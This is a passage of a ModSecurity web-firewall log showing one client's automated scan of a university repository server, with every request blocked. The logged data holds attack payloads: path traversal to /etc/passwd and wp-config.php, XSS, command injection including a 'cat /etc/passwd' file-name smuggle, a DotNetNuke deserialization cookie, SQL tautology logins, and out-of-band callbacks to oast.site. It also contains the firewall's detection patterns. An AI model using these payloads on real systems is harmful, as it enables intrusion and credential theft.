[Tue Aug 29 11:42:19.404839 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdhHzYAAAAB"]
[Tue Aug 29 11:42:21.549541 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAbo-cAAAAAi"]
[Tue Aug 29 11:42:23.407241 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdPLzEAAAAT"]
[Tue Aug 29 11:42:24.404293 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdUc1YAAAAZ"]
[Tue Aug 29 11:42:25.435050 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAbo-cYAAAAi"]
[Tue Aug 29 11:42:26.416171 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdV7bUAAAAa"]
[Tue Aug 29 11:42:27.355626 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAbo-coAAAAi"]
[Tue Aug 29 11:42:27.447984 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdPLzgAAAAT"]
[Tue Aug 29 11:42:28.428936 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdZZrYAAAAf"]
[Tue Aug 29 11:42:30.394064 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAdb7kMAAAAb"]
[Tue Aug 29 11:42:32.404094 2023] [:error] [pid 1915] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "repository.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAd7fUUAAAAq"]
[Tue Aug 29 11:42:32.435304 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g5h59a17coy8ho.oast.site found within TX:1: cjmnbitjmimt14dgn26g5h59a17coy8ho.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdUc2MAAAAZ"]
[Tue Aug 29 11:42:34.366747 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAeEDvUAAAAy"]
[Tue Aug 29 11:42:34.418339 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAeDipoAAAAx"]
[Tue Aug 29 11:42:40.519648 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAdXInUAAAAd"]
[Tue Aug 29 11:42:41.438610 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QcCo-f0AAAeZ54QAAAAN"]
[Tue Aug 29 11:42:41.480907 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAdOeSUAAAAS"]
[Tue Aug 29 11:42:42.366558 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAeX1A0AAAAK"]
[Tue Aug 29 11:42:43.381126 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAbo-d8AAAAi"]
[Tue Aug 29 11:42:46.372169 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAeX1BQAAAAK"]
[Tue Aug 29 11:42:46.562472 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAenGXoAAAAM"]
[Tue Aug 29 11:42:47.401271 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAbo-ecAAAAi"]
[Tue Aug 29 11:42:48.399201 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAeZ54kAAAAN"]
[Tue Aug 29 11:42:48.402438 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAenGX0AAAAM"]
[Tue Aug 29 11:42:48.410878 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAeDiq8AAAAx"]
[Tue Aug 29 11:42:48.507747 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26grboroe8zqcf5e.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAdSZNsAAAAX"]
[Tue Aug 29 11:42:50.388251 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdxUSkAAAAC"]
[Tue Aug 29 11:42:51.354610 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAc92z8AAAAD"]
[Tue Aug 29 11:42:51.377736 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] 